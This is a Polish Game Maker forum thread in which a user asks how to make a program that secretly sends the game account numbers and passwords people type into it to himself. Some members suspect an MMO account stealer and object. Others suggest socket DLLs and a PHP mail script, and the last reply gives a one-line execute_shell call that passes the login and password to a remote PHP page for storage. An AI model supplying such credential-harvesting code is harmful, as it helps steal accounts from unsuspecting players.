ericon Opublikowano 8 Grudnia 2007 Udostępnij Opublikowano 8 Grudnia 2007 Mam pilne pytanie, jeżeli zrobię program na którym ktoś by wpisał jakiś tekst (loging i hasło) czy można zrobić tak żeby te dane zostały wysłane na e-mail? Prościej: Zrobię program w którym pojawia się miejsce na wpisanie nr konta oraz hasła i jeżeli ktoś je wypełni to czy można przekazać te dane na e-mail? Jeżeli tak to jak to zrobić??? Proszę o szybką odp. Pozdro Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Marek.S Opublikowano 8 Grudnia 2007 Udostępnij Opublikowano 8 Grudnia 2007 pewnie. użyj sock-dll :) Edit: znaczy dzięki niemu możesz sie zalogować na jakieś koto e-mail i z niego wysyłać ;) coś kiedyś Tymon wspominał że konto musi być bez uwierzytelnienia ;P Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Firemark Opublikowano 8 Grudnia 2007 Udostępnij Opublikowano 8 Grudnia 2007 Nie musi miec konta - wystarczy miec server php , gdzie bedzie skrypt z funkcja wysylajaca e-mail. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Marek.S Opublikowano 8 Grudnia 2007 Udostępnij Opublikowano 8 Grudnia 2007 GMSock 1.5.2c Jeden z lepszych DLLi do Game Makera. Zezwala na obsługę socketów. Dzięki niemu możemy sprawdzić pocztę, oglądać strony WWW, sprawdzać właścicieli domen itp. Gorąco polecam! nigdy tego nie używałem, ale cóż... Powodzenia :) Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
ericon Opublikowano 9 Grudnia 2007 Autor Udostępnij Opublikowano 9 Grudnia 2007 chodzi mi troszkę o coś innego, coś jakby niby bot to gry gdzie osoba podaje numer i chasło konta i nawet nie wie ze ta informacja zostaje wysłana do innej osoby czyli mnie, to dał by się tak zrobić? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Sylwester Opublikowano 9 Grudnia 2007 Udostępnij Opublikowano 9 Grudnia 2007 Coś jak keylogger? Chcesz się włamywac na e-maile innych? Nie ładnie! Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
murdalow Opublikowano 9 Grudnia 2007 Udostępnij Opublikowano 9 Grudnia 2007 chodzi mi troszkę o coś innego, coś jakby niby bot to gry gdzie osoba podaje numer i chasło konta i nawet nie wie ze ta informacja zostaje wysłana do innej osoby czyli mnie, to dał by się tak zrobić? ktoś chyba coś takiego robi na gmc... popytaj Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
TeoTN Opublikowano 9 Grudnia 2007 Udostępnij Opublikowano 9 Grudnia 2007 Pachnie kradziejami kont MMO... Może odnośniczek do php??? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
ericon Opublikowano 9 Grudnia 2007 Autor Udostępnij Opublikowano 9 Grudnia 2007 Coś jak keylogger? Chcesz się włamywac na e-maile innych? Nie ładnie! Coś jak keylogger tylko na innej zasadzie, nie chce włamywać się na żadne e-maile chodzi o coś innego. Jeżeli ktoś wie coś na ten temat to niech napisze, jest to dla mnie bardzo ważne. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
PsichiX Opublikowano 9 Grudnia 2007 Udostępnij Opublikowano 9 Grudnia 2007 tak jak mowili - execute_shell('www.twoja.strona.pl/nowe_dane.php?login='+string(login)+'&haslo='+string(haslo)) (gdzie dane zostana zapisane w bazie mysql), albo gmsock.dll - innego prostego wyjscia nie ma. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Rekomendowane odpowiedzi